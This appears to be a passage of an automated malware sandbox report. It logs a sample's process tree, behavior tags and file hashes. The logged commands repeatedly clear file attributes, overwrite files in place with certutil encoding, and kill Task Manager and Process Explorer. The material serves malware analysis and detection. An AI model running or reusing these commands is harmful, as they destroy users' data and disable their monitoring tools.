C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\certutil.execertutil -encode -f "yo.txt" "yo.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "zh-cn.txt" "zh-cn.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\certutil.execertutil -encode -f "zh-cn.txt" "zh-cn.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "zh-tw.txt" "zh-tw.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\certutil.execertutil -encode -f "zh-tw.txt" "zh-tw.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "DESIGNER" "DESIGNER".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "microsoft shared" "microsoft shared".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Services" "Services".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "System" "System".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "MSADDNDR.OLB" "MSADDNDR.OLB".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "MSADDNDR.OLB" "MSADDNDR.OLB".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "ClickToRun" "ClickToRun".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "ink" "ink".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "MSInfo" "MSInfo".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "OFFICE16" "OFFICE16".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "OfficeSoftwareProtectionPlatform" "OfficeSoftwareProtectionPlatform".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Source Engine" "Source Engine".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Stationery" "Stationery".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "TextConv" "TextConv".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Triedit" "Triedit".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "VC" "VC".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "VGX" "VGX".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "VSTO" "VSTO".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "api-ms-win-core-file-l1-2-0.dll" "api-ms-win-core-file-l1-2-0.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "api-ms-win-core-file-l1-2-0.dll" "api-ms-win-core-file-l1-2-0.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "api-ms-win-core-file-l2-1-0.dll" "api-ms-win-core-file-l2-1-0.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "api-ms-win-core-file-l2-1-0.dll" "api-ms-win-core-file-l2-1-0.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "api-ms-win-core-localization-l1-2-0.dll" "api-ms-win-core-localization-l1-2-0.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "api-ms-win-core-localization-l1-2-0.dll" "api-ms-win-core-localization-l1-2-0.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "api-ms-win-core-processthreads-l1-1-1.dll" "api-ms-win-core-processthreads-l1-1-1.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "api-ms-win-core-processthreads-l1-1-1.dll" "api-ms-win-core-processthreads-l1-1-1.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "api-ms-win-core-synch-l1-2-0.dll" "api-ms-win-core-synch-l1-2-0.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "api-ms-win-core-synch-l1-2-0.dll" "api-ms-win-core-synch-l1-2-0.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "api-ms-win-core-timezone-l1-1-0.dll" "api-ms-win-core-timezone-l1-1-0.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "api-ms-win-core-timezone-l1-1-0.dll" "api-ms-win-core-timezone-l1-1-0.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "api-ms-win-core-xstate-l2-1-0.dll" "api-ms-win-core-xstate-l2-1-0.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "api-ms-win-core-xstate-l2-1-0.dll" "api-ms-win-core-xstate-l2-1-0.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "api-ms-win-crt-conio-l1-1-0.dll" "api-ms-win-crt-conio-l1-1-0.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "api-ms-win-crt-conio-l1-1-0.dll" "api-ms-win-crt-conio-l1-1-0.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "api-ms-win-crt-convert-l1-1-0.dll" "api-ms-win-crt-convert-l1-1-0.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "api-ms-win-crt-convert-l1-1-0.dll" "api-ms-win-crt-convert-l1-1-0.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "api-ms-win-crt-environment-l1-1-0.dll" "api-ms-win-crt-environment-l1-1-0.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "api-ms-win-crt-environment-l1-1-0.dll" "api-ms-win-crt-environment-l1-1-0.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "api-ms-win-crt-filesystem-l1-1-0.dll" "api-ms-win-crt-filesystem-l1-1-0.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\certutil.execertutil -encode -f "api-ms-win-crt-filesystem-l1-1-0.dll" "api-ms-win-crt-filesystem-l1-1-0.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "api-ms-win-crt-heap-l1-1-0.dll" "api-ms-win-crt-heap-l1-1-0.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "api-ms-win-crt-heap-l1-1-0.dll" "api-ms-win-crt-heap-l1-1-0.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "api-ms-win-crt-locale-l1-1-0.dll" "api-ms-win-crt-locale-l1-1-0.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "api-ms-win-crt-locale-l1-1-0.dll" "api-ms-win-crt-locale-l1-1-0.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "api-ms-win-crt-math-l1-1-0.dll" "api-ms-win-crt-math-l1-1-0.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\certutil.execertutil -encode -f "api-ms-win-crt-math-l1-1-0.dll" "api-ms-win-crt-math-l1-1-0.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "api-ms-win-crt-multibyte-l1-1-0.dll" "api-ms-win-crt-multibyte-l1-1-0.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "api-ms-win-crt-multibyte-l1-1-0.dll" "api-ms-win-crt-multibyte-l1-1-0.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "api-ms-win-crt-private-l1-1-0.dll" "api-ms-win-crt-private-l1-1-0.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\certutil.execertutil -encode -f "api-ms-win-crt-private-l1-1-0.dll" "api-ms-win-crt-private-l1-1-0.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "api-ms-win-crt-process-l1-1-0.dll" "api-ms-win-crt-process-l1-1-0.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "api-ms-win-crt-process-l1-1-0.dll" "api-ms-win-crt-process-l1-1-0.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "api-ms-win-crt-runtime-l1-1-0.dll" "api-ms-win-crt-runtime-l1-1-0.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\system32\certutil.execertutil -encode -f "api-ms-win-crt-runtime-l1-1-0.dll" "api-ms-win-crt-runtime-l1-1-0.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "api-ms-win-crt-stdio-l1-1-0.dll" "api-ms-win-crt-stdio-l1-1-0.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "api-ms-win-crt-stdio-l1-1-0.dll" "api-ms-win-crt-stdio-l1-1-0.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "api-ms-win-crt-string-l1-1-0.dll" "api-ms-win-crt-string-l1-1-0.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\certutil.execertutil -encode -f "api-ms-win-crt-string-l1-1-0.dll" "api-ms-win-crt-string-l1-1-0.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "api-ms-win-crt-time-l1-1-0.dll" "api-ms-win-crt-time-l1-1-0.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "api-ms-win-crt-time-l1-1-0.dll" "api-ms-win-crt-time-l1-1-0.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "api-ms-win-crt-utility-l1-1-0.dll" "api-ms-win-crt-utility-l1-1-0.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "api-ms-win-crt-utility-l1-1-0.dll" "api-ms-win-crt-utility-l1-1-0.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ApiClient.dll" "ApiClient.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ApiClient.dll" "ApiClient.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "AppVCatalog.dll" "AppVCatalog.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "AppVCatalog.dll" "AppVCatalog.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "appvcleaner.exe" "appvcleaner.exe".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "appvcleaner.exe" "appvcleaner.exe".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "AppVClient.man" "AppVClient.man".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "AppVClient.man" "AppVClient.man".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "AppVClientIsv.man" "AppVClientIsv.man".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "AppVClientIsv.man" "AppVClientIsv.man".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "AppVFileSystemMetadata.dll" "AppVFileSystemMetadata.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "AppVFileSystemMetadata.dll" "AppVFileSystemMetadata.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\System32\mobsync.exeC:\Windows\System32\mobsync.exe -Embedding1⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*1⤵
-
C:\Windows\system32\certutil.execertutil -encode -f "CheckpointBlock.pptm" "CheckpointBlock.pptm".266431⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Drops desktop.ini file(s)
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv 51pHRlgq8k6MqqhsObaS+Q.0.21⤵
- Drops desktop.ini file(s)
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
129B
MD5a526b9e7c716b3489d8cc062fbce4005
SHA12df502a944ff721241be20a9e449d2acd07e0312
SHA256e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88
-
Filesize
234B
MD596c9c6b406f135e671259162e3297a7f
SHA146afd118a72f0d6eff37df1cb5a2736bb09256d0
SHA2562334f05350be7eb42137eea6a49abb1fc501462c278a9c1af98a8d8da8042346
SHA5126b062840792daf34af7f5c384e83caefb206a897f9003856530adadd8fcb5b481e277af579a0609837d6c83bf6cf2935efe12be4f5aa5769e3b0162053c602a1
-
Filesize
234B
MD596c9c6b406f135e671259162e3297a7f
